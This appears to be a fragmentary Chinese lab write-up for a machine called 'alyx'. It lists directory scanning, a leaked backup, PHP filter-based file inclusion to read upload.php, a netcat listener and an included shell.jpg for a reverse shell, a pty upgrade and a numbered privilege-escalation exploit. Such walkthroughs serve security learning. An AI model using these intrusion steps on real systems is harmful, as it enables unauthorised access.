alyx

信息收集

 

 

./dirsearch.py --random-agents -u http://192.168.17.142:8011/-e *

扫描目录

 

 

 

Bak泄露

 

 

 

John frank

 

 

 

登陆到development

 

 

 

Uploader可以上传

 

先看8081

 

 

 

Api

 

 

 

 

 

 

 

 

 

成功

可以包含出apache的一些服务

file=php://filter/read=convert.base64-encode/resource=/var/www/development/uploader/upload.php

 

 

 

FRANKuploads

Nc -lvp 4235

file=/var/www/development/uploader/FRANKuploads/shell.jpg包含可以反弹shell

python -c \'import pty;pty.spawn("/bin/bash")\'

 

 

 

Uname-a

 

获取shell

 

 

 

 

 

 

提权

获取编号15285

 

 

 

 

 

 

 

 

 

获得flag

 

 

分类:

技术点:

相关文章:

  • 2021-04-11
  • 2021-07-26
  • 2021-11-13
  • 2021-12-13
  • 2021-11-16
  • 2021-11-18
  • 2021-06-21
  • 2021-07-26
猜你喜欢
  • 2021-08-07
  • 2021-12-23
  • 2020-11-01
  • 2021-05-16
  • 2022-01-07
  • 2021-10-30
  • 2021-07-11
相关资源
相似解决方案